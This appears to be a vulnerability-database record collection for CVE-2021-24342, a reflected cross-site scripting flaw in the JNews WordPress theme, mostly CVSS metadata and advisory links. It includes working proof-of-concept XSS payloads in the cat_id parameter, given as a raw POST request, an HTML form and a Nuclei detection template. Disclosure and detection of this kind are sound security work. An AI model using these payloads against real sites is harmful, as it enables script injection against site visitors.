Description
The JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
Related
{"id": "WPEX-ID:415CA763-FE65-48CB-ACD3-B375A400217E", "type": "wpexploit", "bulletinFamily": "exploit", "title": "JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)", "description": "The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.\n", "published": "2021-05-24T00:00:00", "modified": "2021-05-24T07:02:58", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "", "reporter": "Truoc Phan", "references": [], "cvelist": ["CVE-2021-24342"], "immutableFields": [], "lastseen": "2021-09-14T23:11:59", "viewCount": 148, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24342"]}, {"type": "patchstack", "idList": ["PATCHSTACK:048FB6A9AD6E12EDBDA8B71AA7323CE3"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:415CA763-FE65-48CB-ACD3-B375A400217E"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24342"]}, {"type": 
"wpvulndb", "idList": ["WPVDB-ID:415CA763-FE65-48CB-ACD3-B375A400217E"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-24342", "epss": "0.001020000", "percentile": "0.400730000", "modified": "2023-03-17"}], "vulnersScore": 0.2}, "sourceData": "POST /?ajax-request=jnews HTTP/1.1\r\nAccept: text/html, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 130\r\nConnection: close\r\n\r\nlang=en_US&cat_id=6\"><svg/onload=alert(/XSS/)>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\r\n\r\n\r\n<html>\r\n <body>\r\n <form action=\"https://example.com/?ajax-request=jnews\" method=\"POST\">\r\n <input type=\"hidden\" name=\"lang\" value=\"en_US\" />\r\n <input type=\"hidden\" name=\"cat_id\" value=\"6"><svg/onload=alert(/XSS/)>\" />\r\n <input type=\"hidden\" name=\"action\" value=\"jnews_build_mega_category_2\" />\r\n <input type=\"hidden\" name=\"number\" value=\"6\" />\r\n <input type=\"hidden\" name=\"tags\" value=\"70,64,10,67\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n", "generation": 0, "_state": {"dependencies": 1660004461, "score": 1698842189, "epss": 1679073339}, "_internal": {"score_hash": "e90c44d1dd8704f47770fd1cee46b675"}}
{"nuclei": [{"lastseen": "2023-12-05T08:47:48", "description": "WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-09-15T00:00:00", "type": "nuclei", "title": "WordPress JNews Theme <8.0.6 - Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2023-11-27T00:00:00", "id": "NUCLEI:CVE-2021-24342", "href": "https://github.com/projectdiscovery/nuclei-templates/tree/main/http/cves/2021/CVE-2021-24342.yaml", "sourceData": "id: CVE-2021-24342\n\ninfo:\n name: WordPress JNews Theme <8.0.6 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress JNews theme before 8.0.6 contains a reflected cross-site scripting vulnerability. 
It does not sanitize the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*).\n remediation: |\n Update to the latest version of the WordPress JNews Theme (>=8.0.6) to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24342\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24342\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.41374\n cpe: cpe:2.3:a:jnews:jnews:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: jnews\n product: jnews\n framework: wordpress\n tags: cve2021,wordpress,xss,wp-plugin,wpscan,cve\n\nhttp:\n - raw:\n - |\n POST /?ajax-request=jnews HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n lang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '</script><script>alert(document.domain)</script>'\n\n - type: word\n part: header\n words:\n - 'Content-Type: text/html'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ca9c3f5478cef6ae3d35ac3079050a5fecc23328373f06b680b40d9eb37305330220363c85b528b8e6c4265cf62264775efb104aeb923d7dcdd926da8f2ac243ff3c:922c64590222798bb761d5b6d8e72950", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "patchstack": [{"lastseen": "2022-06-01T19:32:13", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by Truoc Phan in WordPress JNews premium theme (versions <= 8.0.5).\n\n## Solution\n\n\r\n Update the WordPress JNews premium theme to the latest available version (at least 8.0.6).\r\n ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": 
"LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-05-24T00:00:00", "type": "patchstack", "title": "WordPress JNews premium theme <= 8.0.5 - Reflected Cross-Site Scripting (XSS) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-05-24T00:00:00", "id": "PATCHSTACK:048FB6A9AD6E12EDBDA8B71AA7323CE3", "href": "https://patchstack.com/database/vulnerability/jnews/wordpress-jnews-premium-theme-8-0-5-reflected-cross-site-scripting-xss-vulnerability", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "prion": [{"lastseen": "2023-11-22T00:39:39", "description": "The JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, 
"impactScore": 2.7}, "published": "2021-06-07T11:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-06-10T23:59:00", "id": "PRION:CVE-2021-24342", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-24342", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2021-09-14T23:11:59", "description": "The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.\n\n### PoC\n\nPOST /?ajax-request=jnews HTTP/1.1 Accept: text/html, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 130 Connection: close lang=en_US&cat;_id=6\">&action;=jnews_build_mega_category_2&number;=6&tags;=70%2C64%2C10%2C67 \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-05-24T00:00:00", "type": "wpvulndb", "title": "JNews < 8.0.6 - Reflected 
Cross-Site Scripting (XSS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-05-24T07:02:58", "id": "WPVDB-ID:415CA763-FE65-48CB-ACD3-B375A400217E", "href": "https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T10:45:53", "description": "WordPress is the Wordpress Foundation's set of blogging platforms developed using the PHP language. The platform supports setting up personal blogging sites on servers with PHP and MySQL. WordPress plugin is a WordPress open source application plugin. cross-site scripting vulnerability exists in versions prior to JNews WordPress theme 8.0.6. 
The vulnerability stems from the program not cleaning up the cat_id parameter in POST requests, and an attacker could The vulnerability can be exploited to cause XSS attacks.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-24T00:00:00", "type": "cnvd", "title": "WordPress Plugin Cross-Site Scripting Vulnerability (CNVD-2021-59603)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-08-09T00:00:00", "id": "CNVD-2021-59603", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-59603", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-12-03T14:47:02", "description": "The JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", 
"privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-07T11:15:00", "type": "cve", "title": "CVE-2021-24342", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24342"], "modified": "2021-06-10T23:59:00", "cpe": [], "id": "CVE-2021-24342", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24342", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}]}